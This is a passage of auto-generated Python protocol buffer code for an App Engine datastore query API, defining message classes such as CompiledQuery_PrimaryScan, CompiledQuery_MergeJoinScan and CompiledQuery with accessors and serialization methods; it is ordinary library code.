  koffset = 12
  klimit = 16
  kcompiled_cursor = 30
  kend_compiled_cursor = 31
  kcomposite_index = 19
  krequire_perfect_plan = 20
  kkeys_only = 21
  ktransaction = 22
  kcompile = 25
  kfailover_ms = 26
  kstrong = 32
  kproperty_name = 33
  kgroup_by_property_name = 34
  kdistinct = 24
  kmin_safe_time_seconds = 35
  ksafe_replica_name = 36
  kpersist_offset = 37

  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "app",
    3: "kind",
    4: "Filter",
    6: "op",
    8: "search_query",
    9: "Order",
    10: "property",
    11: "direction",
    12: "offset",
    14: "property",
    16: "limit",
    17: "ancestor",
    18: "hint",
    19: "composite_index",
    20: "require_perfect_plan",
    21: "keys_only",
    22: "transaction",
    23: "count",
    24: "distinct",
    25: "compile",
    26: "failover_ms",
    29: "name_space",
    30: "compiled_cursor",
    31: "end_compiled_cursor",
    32: "strong",
    33: "property_name",
    34: "group_by_property_name",
    35: "min_safe_time_seconds",
    36: "safe_replica_name",
    37: "persist_offset",
    39: "header",
  }, 39)

  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.STRING,
    3: ProtocolBuffer.Encoder.STRING,
    4: ProtocolBuffer.Encoder.STARTGROUP,
    6: ProtocolBuffer.Encoder.NUMERIC,
    8: ProtocolBuffer.Encoder.STRING,
    9: ProtocolBuffer.Encoder.STARTGROUP,
    10: ProtocolBuffer.Encoder.STRING,
    11: ProtocolBuffer.Encoder.NUMERIC,
    12: ProtocolBuffer.Encoder.NUMERIC,
    14: ProtocolBuffer.Encoder.STRING,
    16: ProtocolBuffer.Encoder.NUMERIC,
    17: ProtocolBuffer.Encoder.STRING,
    18: ProtocolBuffer.Encoder.NUMERIC,
    19: ProtocolBuffer.Encoder.STRING,
    20: ProtocolBuffer.Encoder.NUMERIC,
    21: ProtocolBuffer.Encoder.NUMERIC,
    22: ProtocolBuffer.Encoder.STRING,
    23: ProtocolBuffer.Encoder.NUMERIC,
    24: ProtocolBuffer.Encoder.NUMERIC,
    25: ProtocolBuffer.Encoder.NUMERIC,
    26: ProtocolBuffer.Encoder.NUMERIC,
    29: ProtocolBuffer.Encoder.STRING,
    30: ProtocolBuffer.Encoder.STRING,
    31: ProtocolBuffer.Encoder.STRING,
    32: ProtocolBuffer.Encoder.NUMERIC,
    33: ProtocolBuffer.Encoder.STRING,
    34: ProtocolBuffer.Encoder.STRING,
    35: ProtocolBuffer.Encoder.NUMERIC,
    36: ProtocolBuffer.Encoder.STRING,
    37: ProtocolBuffer.Encoder.NUMERIC,
    39: ProtocolBuffer.Encoder.STRING,
  }, 39, ProtocolBuffer.Encoder.MAX_TYPE)


  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting_datastore_v3.Query'
class CompiledQuery_PrimaryScan(ProtocolBuffer.ProtocolMessage):
  has_index_name_ = 0
  index_name_ = ""
  has_start_key_ = 0
  start_key_ = ""
  has_start_inclusive_ = 0
  start_inclusive_ = 0
  has_end_key_ = 0
  end_key_ = ""
  has_end_inclusive_ = 0
  end_inclusive_ = 0
  has_end_unapplied_log_timestamp_us_ = 0
  end_unapplied_log_timestamp_us_ = 0

  def __init__(self, contents=None):
    self.start_postfix_value_ = []
    self.end_postfix_value_ = []
    if contents is not None: self.MergeFromString(contents)

  def index_name(self): return self.index_name_

  def set_index_name(self, x):
    self.has_index_name_ = 1
    self.index_name_ = x

  def clear_index_name(self):
    if self.has_index_name_:
      self.has_index_name_ = 0
      self.index_name_ = ""

  def has_index_name(self): return self.has_index_name_

  def start_key(self): return self.start_key_

  def set_start_key(self, x):
    self.has_start_key_ = 1
    self.start_key_ = x

  def clear_start_key(self):
    if self.has_start_key_:
      self.has_start_key_ = 0
      self.start_key_ = ""

  def has_start_key(self): return self.has_start_key_

  def start_inclusive(self): return self.start_inclusive_

  def set_start_inclusive(self, x):
    self.has_start_inclusive_ = 1
    self.start_inclusive_ = x

  def clear_start_inclusive(self):
    if self.has_start_inclusive_:
      self.has_start_inclusive_ = 0
      self.start_inclusive_ = 0

  def has_start_inclusive(self): return self.has_start_inclusive_

  def end_key(self): return self.end_key_

  def set_end_key(self, x):
    self.has_end_key_ = 1
    self.end_key_ = x

  def clear_end_key(self):
    if self.has_end_key_:
      self.has_end_key_ = 0
      self.end_key_ = ""

  def has_end_key(self): return self.has_end_key_

  def end_inclusive(self): return self.end_inclusive_

  def set_end_inclusive(self, x):
    self.has_end_inclusive_ = 1
    self.end_inclusive_ = x

  def clear_end_inclusive(self):
    if self.has_end_inclusive_:
      self.has_end_inclusive_ = 0
      self.end_inclusive_ = 0

  def has_end_inclusive(self): return self.has_end_inclusive_

  def start_postfix_value_size(self): return len(self.start_postfix_value_)
  def start_postfix_value_list(self): return self.start_postfix_value_

  def start_postfix_value(self, i):
    return self.start_postfix_value_[i]

  def set_start_postfix_value(self, i, x):
    self.start_postfix_value_[i] = x

  def add_start_postfix_value(self, x):
    self.start_postfix_value_.append(x)

  def clear_start_postfix_value(self):
    self.start_postfix_value_ = []

  def end_postfix_value_size(self): return len(self.end_postfix_value_)
  def end_postfix_value_list(self): return self.end_postfix_value_

  def end_postfix_value(self, i):
    return self.end_postfix_value_[i]

  def set_end_postfix_value(self, i, x):
    self.end_postfix_value_[i] = x

  def add_end_postfix_value(self, x):
    self.end_postfix_value_.append(x)

  def clear_end_postfix_value(self):
    self.end_postfix_value_ = []

  def end_unapplied_log_timestamp_us(self): return self.end_unapplied_log_timestamp_us_

  def set_end_unapplied_log_timestamp_us(self, x):
    self.has_end_unapplied_log_timestamp_us_ = 1
    self.end_unapplied_log_timestamp_us_ = x

  def clear_end_unapplied_log_timestamp_us(self):
    if self.has_end_unapplied_log_timestamp_us_:
      self.has_end_unapplied_log_timestamp_us_ = 0
      self.end_unapplied_log_timestamp_us_ = 0

  def has_end_unapplied_log_timestamp_us(self): return self.has_end_unapplied_log_timestamp_us_


  def MergeFrom(self, x):
    assert x is not self
    if (x.has_index_name()): self.set_index_name(x.index_name())
    if (x.has_start_key()): self.set_start_key(x.start_key())
    if (x.has_start_inclusive()): self.set_start_inclusive(x.start_inclusive())
    if (x.has_end_key()): self.set_end_key(x.end_key())
    if (x.has_end_inclusive()): self.set_end_inclusive(x.end_inclusive())
    for i in xrange(x.start_postfix_value_size()): self.add_start_postfix_value(x.start_postfix_value(i))
    for i in xrange(x.end_postfix_value_size()): self.add_end_postfix_value(x.end_postfix_value(i))
    if (x.has_end_unapplied_log_timestamp_us()): self.set_end_unapplied_log_timestamp_us(x.end_unapplied_log_timestamp_us())

  def Equals(self, x):
    if x is self: return 1
    if self.has_index_name_ != x.has_index_name_: return 0
    if self.has_index_name_ and self.index_name_ != x.index_name_: return 0
    if self.has_start_key_ != x.has_start_key_: return 0
    if self.has_start_key_ and self.start_key_ != x.start_key_: return 0
    if self.has_start_inclusive_ != x.has_start_inclusive_: return 0
    if self.has_start_inclusive_ and self.start_inclusive_ != x.start_inclusive_: return 0
    if self.has_end_key_ != x.has_end_key_: return 0
    if self.has_end_key_ and self.end_key_ != x.end_key_: return 0
    if self.has_end_inclusive_ != x.has_end_inclusive_: return 0
    if self.has_end_inclusive_ and self.end_inclusive_ != x.end_inclusive_: return 0
    if len(self.start_postfix_value_) != len(x.start_postfix_value_): return 0
    for e1, e2 in zip(self.start_postfix_value_, x.start_postfix_value_):
      if e1 != e2: return 0
    if len(self.end_postfix_value_) != len(x.end_postfix_value_): return 0
    for e1, e2 in zip(self.end_postfix_value_, x.end_postfix_value_):
      if e1 != e2: return 0
    if self.has_end_unapplied_log_timestamp_us_ != x.has_end_unapplied_log_timestamp_us_: return 0
    if self.has_end_unapplied_log_timestamp_us_ and self.end_unapplied_log_timestamp_us_ != x.end_unapplied_log_timestamp_us_: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    initialized = 1
    return initialized

  def ByteSize(self):
    n = 0
    if (self.has_index_name_): n += 1 + self.lengthString(len(self.index_name_))
    if (self.has_start_key_): n += 1 + self.lengthString(len(self.start_key_))
    if (self.has_start_inclusive_): n += 2
    if (self.has_end_key_): n += 1 + self.lengthString(len(self.end_key_))
    if (self.has_end_inclusive_): n += 2
    n += 2 * len(self.start_postfix_value_)
    for i in xrange(len(self.start_postfix_value_)): n += self.lengthString(len(self.start_postfix_value_[i]))
    n += 2 * len(self.end_postfix_value_)
    for i in xrange(len(self.end_postfix_value_)): n += self.lengthString(len(self.end_postfix_value_[i]))
    if (self.has_end_unapplied_log_timestamp_us_): n += 2 + self.lengthVarInt64(self.end_unapplied_log_timestamp_us_)
    return n

  def ByteSizePartial(self):
    n = 0
    if (self.has_index_name_): n += 1 + self.lengthString(len(self.index_name_))
    if (self.has_start_key_): n += 1 + self.lengthString(len(self.start_key_))
    if (self.has_start_inclusive_): n += 2
    if (self.has_end_key_): n += 1 + self.lengthString(len(self.end_key_))
    if (self.has_end_inclusive_): n += 2
    n += 2 * len(self.start_postfix_value_)
    for i in xrange(len(self.start_postfix_value_)): n += self.lengthString(len(self.start_postfix_value_[i]))
    n += 2 * len(self.end_postfix_value_)
    for i in xrange(len(self.end_postfix_value_)): n += self.lengthString(len(self.end_postfix_value_[i]))
    if (self.has_end_unapplied_log_timestamp_us_): n += 2 + self.lengthVarInt64(self.end_unapplied_log_timestamp_us_)
    return n

  def Clear(self):
    self.clear_index_name()
    self.clear_start_key()
    self.clear_start_inclusive()
    self.clear_end_key()
    self.clear_end_inclusive()
    self.clear_start_postfix_value()
    self.clear_end_postfix_value()
    self.clear_end_unapplied_log_timestamp_us()

  def OutputUnchecked(self, out):
    if (self.has_index_name_):
      out.putVarInt32(18)
      out.putPrefixedString(self.index_name_)
    if (self.has_start_key_):
      out.putVarInt32(26)
      out.putPrefixedString(self.start_key_)
    if (self.has_start_inclusive_):
      out.putVarInt32(32)
      out.putBoolean(self.start_inclusive_)
    if (self.has_end_key_):
      out.putVarInt32(42)
      out.putPrefixedString(self.end_key_)
    if (self.has_end_inclusive_):
      out.putVarInt32(48)
      out.putBoolean(self.end_inclusive_)
    if (self.has_end_unapplied_log_timestamp_us_):
      out.putVarInt32(152)
      out.putVarInt64(self.end_unapplied_log_timestamp_us_)
    for i in xrange(len(self.start_postfix_value_)):
      out.putVarInt32(178)
      out.putPrefixedString(self.start_postfix_value_[i])
    for i in xrange(len(self.end_postfix_value_)):
      out.putVarInt32(186)
      out.putPrefixedString(self.end_postfix_value_[i])

  def OutputPartial(self, out):
    if (self.has_index_name_):
      out.putVarInt32(18)
      out.putPrefixedString(self.index_name_)
    if (self.has_start_key_):
      out.putVarInt32(26)
      out.putPrefixedString(self.start_key_)
    if (self.has_start_inclusive_):
      out.putVarInt32(32)
      out.putBoolean(self.start_inclusive_)
    if (self.has_end_key_):
      out.putVarInt32(42)
      out.putPrefixedString(self.end_key_)
    if (self.has_end_inclusive_):
      out.putVarInt32(48)
      out.putBoolean(self.end_inclusive_)
    if (self.has_end_unapplied_log_timestamp_us_):
      out.putVarInt32(152)
      out.putVarInt64(self.end_unapplied_log_timestamp_us_)
    for i in xrange(len(self.start_postfix_value_)):
      out.putVarInt32(178)
      out.putPrefixedString(self.start_postfix_value_[i])
    for i in xrange(len(self.end_postfix_value_)):
      out.putVarInt32(186)
      out.putPrefixedString(self.end_postfix_value_[i])

  def TryMerge(self, d):
    while 1:
      tt = d.getVarInt32()
      if tt == 12: break
      if tt == 18:
        self.set_index_name(d.getPrefixedString())
        continue
      if tt == 26:
        self.set_start_key(d.getPrefixedString())
        continue
      if tt == 32:
        self.set_start_inclusive(d.getBoolean())
        continue
      if tt == 42:
        self.set_end_key(d.getPrefixedString())
        continue
      if tt == 48:
        self.set_end_inclusive(d.getBoolean())
        continue
      if tt == 152:
        self.set_end_unapplied_log_timestamp_us(d.getVarInt64())
        continue
      if tt == 178:
        self.add_start_postfix_value(d.getPrefixedString())
        continue
      if tt == 186:
        self.add_end_postfix_value(d.getPrefixedString())
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    res=""
    if self.has_index_name_: res+=prefix+("index_name: %s\n" % self.DebugFormatString(self.index_name_))
    if self.has_start_key_: res+=prefix+("start_key: %s\n" % self.DebugFormatString(self.start_key_))
    if self.has_start_inclusive_: res+=prefix+("start_inclusive: %s\n" % self.DebugFormatBool(self.start_inclusive_))
    if self.has_end_key_: res+=prefix+("end_key: %s\n" % self.DebugFormatString(self.end_key_))
    if self.has_end_inclusive_: res+=prefix+("end_inclusive: %s\n" % self.DebugFormatBool(self.end_inclusive_))
    cnt=0
    for e in self.start_postfix_value_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("start_postfix_value%s: %s\n" % (elm, self.DebugFormatString(e)))
      cnt+=1
    cnt=0
    for e in self.end_postfix_value_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("end_postfix_value%s: %s\n" % (elm, self.DebugFormatString(e)))
      cnt+=1
    if self.has_end_unapplied_log_timestamp_us_: res+=prefix+("end_unapplied_log_timestamp_us: %s\n" % self.DebugFormatInt64(self.end_unapplied_log_timestamp_us_))
    return res

class CompiledQuery_MergeJoinScan(ProtocolBuffer.ProtocolMessage):
  has_index_name_ = 0
  index_name_ = ""
  has_value_prefix_ = 0
  value_prefix_ = 0

  def __init__(self, contents=None):
    self.prefix_value_ = []
    if contents is not None: self.MergeFromString(contents)

  def index_name(self): return self.index_name_

  def set_index_name(self, x):
    self.has_index_name_ = 1
    self.index_name_ = x

  def clear_index_name(self):
    if self.has_index_name_:
      self.has_index_name_ = 0
      self.index_name_ = ""

  def has_index_name(self): return self.has_index_name_

  def prefix_value_size(self): return len(self.prefix_value_)
  def prefix_value_list(self): return self.prefix_value_

  def prefix_value(self, i):
    return self.prefix_value_[i]

  def set_prefix_value(self, i, x):
    self.prefix_value_[i] = x

  def add_prefix_value(self, x):
    self.prefix_value_.append(x)

  def clear_prefix_value(self):
    self.prefix_value_ = []

  def value_prefix(self): return self.value_prefix_

  def set_value_prefix(self, x):
    self.has_value_prefix_ = 1
    self.value_prefix_ = x

  def clear_value_prefix(self):
    if self.has_value_prefix_:
      self.has_value_prefix_ = 0
      self.value_prefix_ = 0

  def has_value_prefix(self): return self.has_value_prefix_


  def MergeFrom(self, x):
    assert x is not self
    if (x.has_index_name()): self.set_index_name(x.index_name())
    for i in xrange(x.prefix_value_size()): self.add_prefix_value(x.prefix_value(i))
    if (x.has_value_prefix()): self.set_value_prefix(x.value_prefix())

  def Equals(self, x):
    if x is self: return 1
    if self.has_index_name_ != x.has_index_name_: return 0
    if self.has_index_name_ and self.index_name_ != x.index_name_: return 0
    if len(self.prefix_value_) != len(x.prefix_value_): return 0
    for e1, e2 in zip(self.prefix_value_, x.prefix_value_):
      if e1 != e2: return 0
    if self.has_value_prefix_ != x.has_value_prefix_: return 0
    if self.has_value_prefix_ and self.value_prefix_ != x.value_prefix_: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    initialized = 1
    if (not self.has_index_name_):
      initialized = 0
      if debug_strs is not None:
        debug_strs.append('Required field: index_name not set.')
    return initialized

  def ByteSize(self):
    n = 0
    n += self.lengthString(len(self.index_name_))
    n += 1 * len(self.prefix_value_)
    for i in xrange(len(self.prefix_value_)): n += self.lengthString(len(self.prefix_value_[i]))
    if (self.has_value_prefix_): n += 3
    return n + 1

  def ByteSizePartial(self):
    n = 0
    if (self.has_index_name_):
      n += 1
      n += self.lengthString(len(self.index_name_))
    n += 1 * len(self.prefix_value_)
    for i in xrange(len(self.prefix_value_)): n += self.lengthString(len(self.prefix_value_[i]))
    if (self.has_value_prefix_): n += 3
    return n

  def Clear(self):
    self.clear_index_name()
    self.clear_prefix_value()
    self.clear_value_prefix()

  def OutputUnchecked(self, out):
    out.putVarInt32(66)
    out.putPrefixedString(self.index_name_)
    for i in xrange(len(self.prefix_value_)):
      out.putVarInt32(74)
      out.putPrefixedString(self.prefix_value_[i])
    if (self.has_value_prefix_):
      out.putVarInt32(160)
      out.putBoolean(self.value_prefix_)

  def OutputPartial(self, out):
    if (self.has_index_name_):
      out.putVarInt32(66)
      out.putPrefixedString(self.index_name_)
    for i in xrange(len(self.prefix_value_)):
      out.putVarInt32(74)
      out.putPrefixedString(self.prefix_value_[i])
    if (self.has_value_prefix_):
      out.putVarInt32(160)
      out.putBoolean(self.value_prefix_)

  def TryMerge(self, d):
    while 1:
      tt = d.getVarInt32()
      if tt == 60: break
      if tt == 66:
        self.set_index_name(d.getPrefixedString())
        continue
      if tt == 74:
        self.add_prefix_value(d.getPrefixedString())
        continue
      if tt == 160:
        self.set_value_prefix(d.getBoolean())
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    res=""
    if self.has_index_name_: res+=prefix+("index_name: %s\n" % self.DebugFormatString(self.index_name_))
    cnt=0
    for e in self.prefix_value_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("prefix_value%s: %s\n" % (elm, self.DebugFormatString(e)))
      cnt+=1
    if self.has_value_prefix_: res+=prefix+("value_prefix: %s\n" % self.DebugFormatBool(self.value_prefix_))
    return res

class CompiledQuery_EntityFilter(ProtocolBuffer.ProtocolMessage):
  has_distinct_ = 0
  distinct_ = 0
  has_kind_ = 0
  kind_ = ""
  has_ancestor_ = 0
  ancestor_ = None

  def __init__(self, contents=None):
    self.lazy_init_lock_ = thread.allocate_lock()
    if contents is not None: self.MergeFromString(contents)

  def distinct(self): return self.distinct_

  def set_distinct(self, x):
    self.has_distinct_ = 1
    self.distinct_ = x

  def clear_distinct(self):
    if self.has_distinct_:
      self.has_distinct_ = 0
      self.distinct_ = 0

  def has_distinct(self): return self.has_distinct_

  def kind(self): return self.kind_

  def set_kind(self, x):
    self.has_kind_ = 1
    self.kind_ = x

  def clear_kind(self):
    if self.has_kind_:
      self.has_kind_ = 0
      self.kind_ = ""

  def has_kind(self): return self.has_kind_

  def ancestor(self):
    if self.ancestor_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.ancestor_ is None: self.ancestor_ = Reference()
      finally:
        self.lazy_init_lock_.release()
    return self.ancestor_

  def mutable_ancestor(self): self.has_ancestor_ = 1; return self.ancestor()

  def clear_ancestor(self):

    if self.has_ancestor_:
      self.has_ancestor_ = 0;
      if self.ancestor_ is not None: self.ancestor_.Clear()

  def has_ancestor(self): return self.has_ancestor_


  def MergeFrom(self, x):
    assert x is not self
    if (x.has_distinct()): self.set_distinct(x.distinct())
    if (x.has_kind()): self.set_kind(x.kind())
    if (x.has_ancestor()): self.mutable_ancestor().MergeFrom(x.ancestor())

  def Equals(self, x):
    if x is self: return 1
    if self.has_distinct_ != x.has_distinct_: return 0
    if self.has_distinct_ and self.distinct_ != x.distinct_: return 0
    if self.has_kind_ != x.has_kind_: return 0
    if self.has_kind_ and self.kind_ != x.kind_: return 0
    if self.has_ancestor_ != x.has_ancestor_: return 0
    if self.has_ancestor_ and self.ancestor_ != x.ancestor_: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    initialized = 1
    if (self.has_ancestor_ and not self.ancestor_.IsInitialized(debug_strs)): initialized = 0
    return initialized

  def ByteSize(self):
    n = 0
    if (self.has_distinct_): n += 2
    if (self.has_kind_): n += 2 + self.lengthString(len(self.kind_))
    if (self.has_ancestor_): n += 2 + self.lengthString(self.ancestor_.ByteSize())
    return n

  def ByteSizePartial(self):
    n = 0
    if (self.has_distinct_): n += 2
    if (self.has_kind_): n += 2 + self.lengthString(len(self.kind_))
    if (self.has_ancestor_): n += 2 + self.lengthString(self.ancestor_.ByteSizePartial())
    return n

  def Clear(self):
    self.clear_distinct()
    self.clear_kind()
    self.clear_ancestor()

  def OutputUnchecked(self, out):
    if (self.has_distinct_):
      out.putVarInt32(112)
      out.putBoolean(self.distinct_)
    if (self.has_kind_):
      out.putVarInt32(138)
      out.putPrefixedString(self.kind_)
    if (self.has_ancestor_):
      out.putVarInt32(146)
      out.putVarInt32(self.ancestor_.ByteSize())
      self.ancestor_.OutputUnchecked(out)

  def OutputPartial(self, out):
    if (self.has_distinct_):
      out.putVarInt32(112)
      out.putBoolean(self.distinct_)
    if (self.has_kind_):
      out.putVarInt32(138)
      out.putPrefixedString(self.kind_)
    if (self.has_ancestor_):
      out.putVarInt32(146)
      out.putVarInt32(self.ancestor_.ByteSizePartial())
      self.ancestor_.OutputPartial(out)

  def TryMerge(self, d):
    while 1:
      tt = d.getVarInt32()
      if tt == 108: break
      if tt == 112:
        self.set_distinct(d.getBoolean())
        continue
      if tt == 138:
        self.set_kind(d.getPrefixedString())
        continue
      if tt == 146:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_ancestor().TryMerge(tmp)
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    res=""
    if self.has_distinct_: res+=prefix+("distinct: %s\n" % self.DebugFormatBool(self.distinct_))
    if self.has_kind_: res+=prefix+("kind: %s\n" % self.DebugFormatString(self.kind_))
    if self.has_ancestor_:
      res+=prefix+"ancestor <\n"
      res+=self.ancestor_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    return res

class CompiledQuery(ProtocolBuffer.ProtocolMessage):
  has_primaryscan_ = 0
  has_index_def_ = 0
  index_def_ = None
  has_offset_ = 0
  offset_ = 0
  has_limit_ = 0
  limit_ = 0
  has_keys_only_ = 0
  keys_only_ = 0
  has_distinct_infix_size_ = 0
  distinct_infix_size_ = 0
  has_entityfilter_ = 0
  entityfilter_ = None
  has_plan_label_ = 0
  plan_label_ = ""

  def __init__(self, contents=None):
    self.primaryscan_ = CompiledQuery_PrimaryScan()
    self.mergejoinscan_ = []
    self.property_name_ = []
    self.lazy_init_lock_ = thread.allocate_lock()
    if contents is not None: self.MergeFromString(contents)

  def primaryscan(self): return self.primaryscan_

  def mutable_primaryscan(self): self.has_primaryscan_ = 1; return self.primaryscan_

  def clear_primaryscan(self):self.has_primaryscan_ = 0; self.primaryscan_.Clear()

  def has_primaryscan(self): return self.has_primaryscan_

  def mergejoinscan_size(self): return len(self.mergejoinscan_)
  def mergejoinscan_list(self): return self.mergejoinscan_

  def mergejoinscan(self, i):
    return self.mergejoinscan_[i]

  def mutable_mergejoinscan(self, i):
    return self.mergejoinscan_[i]

  def add_mergejoinscan(self):
    x = CompiledQuery_MergeJoinScan()
    self.mergejoinscan_.append(x)
    return x

  def clear_mergejoinscan(self):
    self.mergejoinscan_ = []
  def index_def(self):
    if self.index_def_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.index_def_ is None: self.index_def_ = Index()
      finally:
        self.lazy_init_lock_.release()
    return self.index_def_

  def mutable_index_def(self): self.has_index_def_ = 1; return self.index_def()

  def clear_index_def(self):

    if self.has_index_def_:
      self.has_index_def_ = 0;
      if self.index_def_ is not None: self.index_def_.Clear()

  def has_index_def(self): return self.has_index_def_

  def offset(self): return self.offset_

  def set_offset(self, x):
    self.has_offset_ = 1
    self.offset_ = x

  def clear_offset(self):
    if self.has_offset_:
      self.has_offset_ = 0
      self.offset_ = 0

  def has_offset(self): return self.has_offset_

  def limit(self): return self.limit_

  def set_limit(self, x):
    self.has_limit_ = 1
    self.limit_ = x

  def clear_limit(self):
    if self.has_limit_:
      self.has_limit_ = 0
      self.limit_ = 0

  def has_limit(self): return self.has_limit_

  def keys_only(self): return self.keys_only_

  def set_keys_only(self, x):
    self.has_keys_only_ = 1
    self.keys_only_ = x

  def clear_keys_only(self):
    if self.has_keys_only_:
      self.has_keys_only_ = 0
      self.keys_only_ = 0

  def has_keys_only(self): return self.has_keys_only_

  def property_name_size(self): return len(self.property_name_)
  def property_name_list(self): return self.property_name_

  def property_name(self, i):
    return self.property_name_[i]

  def set_property_name(self, i, x):
    self.property_name_[i] = x

  def add_property_name(self, x):
    self.property_name_.append(x)

  def clear_property_name(self):
    self.property_name_ = []

  def distinct_infix_size(self): return self.distinct_infix_size_

  def set_distinct_infix_size(self, x):
    self.has_distinct_infix_size_ = 1
    self.distinct_infix_size_ = x

  def clear_distinct_infix_size(self):
    if self.has_distinct_infix_size_:
      self.has_distinct_infix_size_ = 0
      self.distinct_infix_size_ = 0

  def has_distinct_infix_size(self): return self.has_distinct_infix_size_

  def entityfilter(self):
    if self.entityfilter_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.entityfilter_ is None: self.entityfilter_ = CompiledQuery_EntityFilter()
      finally:
        self.lazy_init_lock_.release()
    return self.entityfilter_

  def mutable_entityfilter(self): self.has_entityfilter_ = 1; return self.entityfilter()

  def clear_entityfilter(self):

    if self.has_entityfilter_:
      self.has_entityfilter_ = 0;
      if self.entityfilter_ is not None: self.entityfilter_.Clear()

  def has_entityfilter(self): return self.has_entityfilter_

  def plan_label(self): return self.plan_label_

  def set_plan_label(self, x):
    self.has_plan_label_ = 1
    self.plan_label_ = x

  def clear_plan_label(self):
    if self.has_plan_label_:
      self.has_plan_label_ = 0
      self.plan_label_ = ""

  def has_plan_label(self): return self.has_plan_label_


  def MergeFrom(self, x):
    assert x is not self
    if (x.has_primaryscan()): self.mutable_primaryscan().MergeFrom(x.primaryscan())
    for i in xrange(x.mergejoinscan_size()): self.add_mergejoinscan().CopyFrom(x.mergejoinscan(i))
    if (x.has_index_def()): self.mutable_index_def().MergeFrom(x.index_def())
    if (x.has_offset()): self.set_offset(x.offset())
    if (x.has_limit()): self.set_limit(x.limit())
    if (x.has_keys_only()): self.set_keys_only(x.keys_only())
    for i in xrange(x.property_name_size()): self.add_property_name(x.property_name(i))
    if (x.has_distinct_infix_size()): self.set_distinct_infix_size(x.distinct_infix_size())
    if (x.has_entityfilter()): self.mutable_entityfilter().MergeFrom(x.entityfilter())
    if (x.has_plan_label()): self.set_plan_label(x.plan_label())

  def Equals(self, x):
    if x is self: return 1
    if self.has_primaryscan_ != x.has_primaryscan_: return 0
    if self.has_primaryscan_ and self.primaryscan_ != x.primaryscan_: return 0
    if len(self.mergejoinscan_) != len(x.mergejoinscan_): return 0
    for e1, e2 in zip(self.mergejoinscan_, x.mergejoinscan_):
      if e1 != e2: return 0
    if self.has_index_def_ != x.has_index_def_: return 0
    if self.has_index_def_ and self.index_def_ != x.index_def_: return 0
    if self.has_offset_ != x.has_offset_: return 0
    if self.has_offset_ and self.offset_ != x.offset_: return 0
    if self.has_limit_ != x.has_limit_: return 0
    if self.has_limit_ and self.limit_ != x.limit_: return 0
    if self.has_keys_only_ != x.has_keys_only_: return 0
    if self.has_keys_only_ and self.keys_only_ != x.keys_only_: return 0
    if len(self.property_name_) != len(x.property_name_): return 0
    for e1, e2 in zip(self.property_name_, x.property_name_):
      if e1 != e2: return 0
    if self.has_distinct_infix_size_ != x.has_distinct_infix_size_: return 0
    if self.has_distinct_infix_size_ and self.distinct_infix_size_ != x.distinct_infix_size_: return 0
    if self.has_entityfilter_ != x.has_entityfilter_: return 0
    if self.has_entityfilter_ and self.entityfilter_ != x.entityfilter_: return 0
    if self.has_plan_label_ != x.has_plan_label_: return 0
    if self.has_plan_label_ and self.plan_label_ != x.plan_label_: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    initialized = 1
    if (not self.has_primaryscan_):
      initialized = 0
      if debug_strs is not None:
        debug_strs.append('Required field: primaryscan not set.')
    elif not self.primaryscan_.IsInitialized(debug_strs): initialized = 0
    for p in self.mergejoinscan_:
      if not p.IsInitialized(debug_strs): initialized=0
    if (self.has_index_def_ and not self.index_def_.IsInitialized(debug_strs)): initialized = 0
    if (not self.has_keys_only_):
      initialized = 0
      if debug_strs is not None:
        debug_strs.append('Required field: keys_only not set.')
    if (self.has_entityfilter_ and not self.entityfilter_.IsInitialized(debug_strs)): initialized = 0
    return initialized

  def ByteSize(self):
    n = 0
    n += self.primaryscan_.ByteSize()
    n += 2 * len(self.mergejoinscan_)
    for i in xrange(len(self.mergejoinscan_)): n += self.mergejoinscan_[i].ByteSize()
    if (self.has_index_def_): n += 2 + self.lengthString(self.index_def_.ByteSize())
    if (self.has_offset_): n += 1 + self.lengthVarInt64(self.offset_)
    if (self.has_limit_): n += 1 + self.lengthVarInt64(self.limit_)
    n += 2 * len(self.property_name_)
    for i in xrange(len(self.property_name_)): n += self.lengthString(len(self.property_name_[i]))
    if (self.has_distinct_infix_size_): n += 2 + self.lengthVarInt64(self.distinct_infix_size_)
    if (self.has_entityfilter_): n += 2 + self.entityfilter_.ByteSize()
    if (self.has_plan_label_): n += 2 + self.lengthString(len(self.plan_label_))
    return n + 4

  def ByteSizePartial(self):
    n = 0
    if (self.has_primaryscan_):
      n += 2
      n += self.primaryscan_.ByteSizePartial()
    n += 2 * len(self.mergejoinscan_)
    for i in xrange(len(self.mergejoinscan_)): n += self.mergejoinscan_[i].ByteSizePartial()
    if (self.has_index_def_): n += 2 + self.lengthString(self.index_def_.ByteSizePartial())
    if (self.has_offset_): n += 1 + self.lengthVarInt64(self.offset_)
    if (self.has_limit_): n += 1 + self.lengthVarInt64(self.limit_)
    if (self.has_keys_only_):
      n += 2
    n += 2 * len(self.property_name_)
    for i in xrange(len(self.property_name_)): n += self.lengthString(len(self.property_name_[i]))
    if (self.has_distinct_infix_size_): n += 2 + self.lengthVarInt64(self.distinct_infix_size_)
    if (self.has_entityfilter_): n += 2 + self.entityfilter_.ByteSizePartial()
    if (self.has_plan_label_): n += 2 + self.lengthString(len(self.plan_label_))
    return n

  def Clear(self):
    self.clear_primaryscan()
